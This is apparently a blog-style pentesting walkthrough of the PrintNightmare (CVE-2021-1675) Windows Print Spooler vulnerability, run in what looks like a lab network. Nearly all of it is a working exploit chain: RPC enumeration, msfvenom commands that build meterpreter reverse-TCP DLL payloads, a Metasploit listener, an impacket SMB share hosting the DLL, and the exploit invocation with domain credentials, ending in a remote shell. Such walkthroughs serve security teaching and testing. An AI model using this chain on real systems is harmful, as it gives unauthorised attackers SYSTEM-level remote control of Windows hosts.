There’s a Windows service called Printer Spooler that, over time, has exposed numerous vulnerabilities. It all started with an unpatched 0-day that was removed from a tweet but later spread via GitHub. Because of this, in this document, I’ll explain the most common attacks against the Printer Spooler service.
PrintNightmare
Explanation of the vulnerability
The Printer Spooler is a Windows service that manages print queues. It receives jobs submitted by the user, converts them to a format the printer understands, and sends them when the printer is available. It runs as a system service (spoolsv.exe) with high privileges, making it a frequent target of attacks, such as the PrintNightmare vulnerability.
How to exploit it
When an attacker tries to exploit the print spooler remotely, to check if a host is vulnerable to the printnightmare flaw, we could use a tool called rpcdump.py which is part of the impacket package, a set of tools widely used in the pentesting environment.
❯ rpcdump.py @10.10.188.66 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol
To exploit this vulnerability, the distribution method for this exploit is a malicious DLL. This method, also known as “fileless” exploitation, allows us to bypass most system protections, such as antivirus software. In this attack, we will trick the print spooler service into installing a new driver from a UNC path and loading it. In our case, this is the malicious DLL, which would provide us with a reverse shell to the attacking computer. To create the malicious DLL, I will use “msfvenom” and, depending on the architecture we are on, we will integrate a Windows x64 or x86 payload into the DLL, providing the local host and local port, where we will start a listener for a callback from the DLL. You can find the IP address of your machine by typing “ifconfig.” We will use the following command to create our malicious DLL.
❯ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 -f dll -o /home/ghost/Pentesting/Print/PrintMalicious_x64.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: /home/ghost/Pentesting/Print/PrintMalicious_x64.dll
And if in another case our architecture was 32 bytes we would use this payload
❯ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 -f dll -o /home/ghost/Pentesting/Print/PrintMalicious_x86.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of dll file: 9216 bytes
Saved as: /home/ghost/Pentesting/Print/PrintMalicious_x86.dll
As we have created our malicious DLL, next we have to start our Listener on the “Metasploit Framework” to get the ‘Meterpreter’ shell back when the DLL is executed on the system. To start the Listener follow the steps below. In the end type ‘exploit -j’ to start the listener in the background.
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.10.10
LHOST => 10.10.10.10
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.10.10:443
Now that we’ve started our receiver, we start our SMB server to host the malicious DLL file. Go to the system path where we saved the DLL file and enter the following command to start the SMB server. Before doing that, make sure you have “Impacket” installed on your computer. Impacket is a collection of open-source modules written in Python, and one of them is smbserver.py, which is the one we’re going to use in this instance. To start the “smbserver.py” script and host the malicious DLL file, enter the following command in the directory where we saved it, in my case /home/ghost/Pentesting/Printer/.
❯ smbserver.py share . -smb2support
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Great, we’re now set up to begin the exploitation process using the CVE-2021–1675 proof-of-concept (POC). To do this, we provide the domain controller and user credentials with the UNC path to the malicious DLL hosted on our system.
❯ python3 CVE-2021-1675.py NetworkAD-EDU.ENGdepartment.local/jjsmith:wellsaidsecurity143@10.10.220.93 '\\\\10.10.10.10\\share\\PrintMalicious_x64.dll'
[*] Connecting to ncacn_np:10.10.220.93[\\PIPE\\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL
[*] Executing \\??\\UNC\\10.10.10.10\\share\\PrintMalicious_x64.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
After a few seconds of running the exploit script, if we go back to the listener we started in ‘Metasploit’ it shows that it has opened a ‘Meterpreter’ session so we can now interact with the victim machine using the ‘Meterpreter shell’.